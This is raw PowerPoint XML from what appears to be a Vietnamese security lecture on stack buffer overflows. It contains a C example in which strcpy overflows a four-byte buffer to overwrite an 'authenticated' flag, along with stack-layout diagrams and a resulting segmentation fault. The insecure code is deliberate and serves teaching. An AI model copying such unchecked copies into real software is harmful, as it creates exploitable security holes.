              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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int main()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   char *mystr = “AuthMe!”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   func(mystr);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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9F568791-A8A1-4321-950A-D32E68C1A10A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="5201641"/>
            <a:ext cx="83820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C31BA996-0111-4687-8807-33DD728ABF80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261936" y="5303241"/>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Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49E41BC9-1592-45C9-97CC-315D79EC4C16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7573157" y="5342133"/>
            <a:ext cx="1134513"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&amp;arg1</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>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CA000187-6DE4-43D2-8F72-00F8F54D260B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1555391" y="5356848"/>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  u  t  h</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="0000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57CDEB32-AB71-4361-B29E-36AC27CAFB9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1622975" y="600174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a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>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D188E936-D4B1-4E07-9F2D-844E7807D13C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3561313" y="5356848"/>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4d 65 21 00</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B65CE70-213B-4D43-AA2A-0B128ADE04DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5567235" y="5348484"/>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RIP</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Arrow: Right 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C90131C-8B39-41C4-A007-FB302AC51E5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="2287050"/>
            <a:ext cx="304800" cy="228600"/>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TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B4EE635-AA10-4473-AE79-362ED74C40C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3548062" y="485874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M  e  ! \0</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">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9206E44-16A4-48E1-90BC-F85347124F4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="2287050"/>
            <a:ext cx="1752600" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pop %ebp</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="7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A7A3430-C590-4362-A545-48CAD927EA1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="2287050"/>
            <a:ext cx="3352799" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>%ebp = 0x0021654d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SEGMENTATION FAULT</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" b="1">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1313362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656F-58EA-4256-842C-C93D12BB462D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Tràn bộ đệm – Ví dụ khác</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BA860ED-B6A0-4F5B-9971-003693CCC754}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F588E20B-C253-440E-83E8-C918A277825C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="922105" y="990600"/>
            <a:ext cx="7162800" cy="3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void func(char *arg1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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int authenticated = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char buffer[4];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   strcpy(buffer, arg1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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if(authenticated){//privileged execution}</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int main()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   char *mystr = “AuthMe!”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   func(mystr);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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B3BD3B75-D99B-4922-A8E7-C348F8DB6FFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5219699" y="3201450"/>
            <a:ext cx="2620157" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hàm đ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ợc thực thi nh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> thế nào?</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2400">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93E5D3C0-3A7D-43BC-BD2E-0353F05FDB44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="5201641"/>
            <a:ext cx="83820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777407B1-6E88-4A1D-A40F-9D3161203392}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261936" y="5303241"/>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7" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35E370DB-FE38-45A1-A779-55B5D2C362E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7573157" y="5342133"/>
            <a:ext cx="1134513"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&amp;arg1</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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E71F1569-58B6-46F8-B250-BD1EE6D95BD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1555391" y="5356848"/>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  u  t  h</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="0000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01AE17EB-5174-4DF6-8AF6-A91BCF4A751E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1622975" y="600174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a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>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07D1F4C-AA58-4B93-A4D9-0BBF876E47E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3561313" y="5356848"/>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4d 65 21 00</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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0E408FA2-E0A5-4B5C-885D-7EF759425746}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="5348484"/>
            <a:ext cx="939122"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RIP</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>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1FBD45CE-842E-409A-A491-CEAE66E202A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3548062" y="485874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M  e  ! \0</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>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80C85967-201A-4BE8-97B6-78F6FA364AD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3348166" y="6001740"/>
            <a:ext cx="2290634"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authenticated</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFD737CB-901B-4C31-9849-5E522DF8AC03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5550239" y="5342133"/>
            <a:ext cx="939122"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SFP</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="008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5001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656F-58EA-4256-842C-C93D12BB462D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Tràn bộ đệm – Ví dụ khác</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BA860ED-B6A0-4F5B-9971-003693CCC754}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F588E20B-C253-440E-83E8-C918A277825C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="922105" y="990600"/>
            <a:ext cx="7162800" cy="3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void func(char *arg1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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int authenticated = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char buffer[4];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   strcpy(buffer, arg1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if(authenticated){//privileged execution}</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int main()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
